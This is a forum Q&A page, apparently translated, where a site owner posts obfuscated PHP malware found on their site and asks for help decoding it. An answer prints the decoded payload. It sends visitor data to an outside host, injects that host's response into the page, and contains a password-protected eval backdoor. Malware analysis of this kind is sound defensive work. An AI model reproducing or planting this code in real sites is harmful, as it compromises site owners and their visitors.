Answer the question
In order to leave comments, you need to log in
How to decrypt the malware?
I found malware on my site. Help to understand its source code.
//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);
$strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8iMz9lq2SlMP1cozEyrP5lqF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqXF4vWzD9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVznG0kWzt9Vv5gMQHbVwV4MGWvBQWvBQt5Lwp5ZQZ5MQywAJRjMwyvBTMvBQR0ZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1OCH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1OCH1EoVaNvKFxcVQ09VPV1MzV3ZQAyAwNmZGp2MGMxAQxkAwL5LJR5BGV5ZmL2MPVcVUftDTI2LJjbp3ElnKOmoTSmnTImXPEsHR9GISfvLlWqXFx7VU0XMJAbolNxnJW2Bjc9VU0="));'); $strings($light);
//###=CACHE END=###
Answer the question
In order to leave comments, you need to log in
$light =
<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/1.10.0 (Ubuntu)</center>
</body>
</html>
zm^r^if (!isset($ibv)) { error_reporting(0);
if(!empty($_COOKIE["client_check"])) { echo $_COOKIE["client_check"]; } else {
$url = "http://forward-index.ru/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&i=1&h=".md5("28e2b82b889b79039d9c5a0f9b8fb81411");
if(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$ibv = curl_exec($ch);
curl_close($ch);
} elseif(ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
}
if(isset($_POST["p"]) && md5(md5($_POST["p"])) == "5fb703e603176e6d491669aa9929366d") { @eval(stripslashes($_POST["c"])); }
echo $ibv;
The minimum knowledge of PHP is enough to understand what is happening here. If a person cannot understand the infection, he does not need to understand it.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question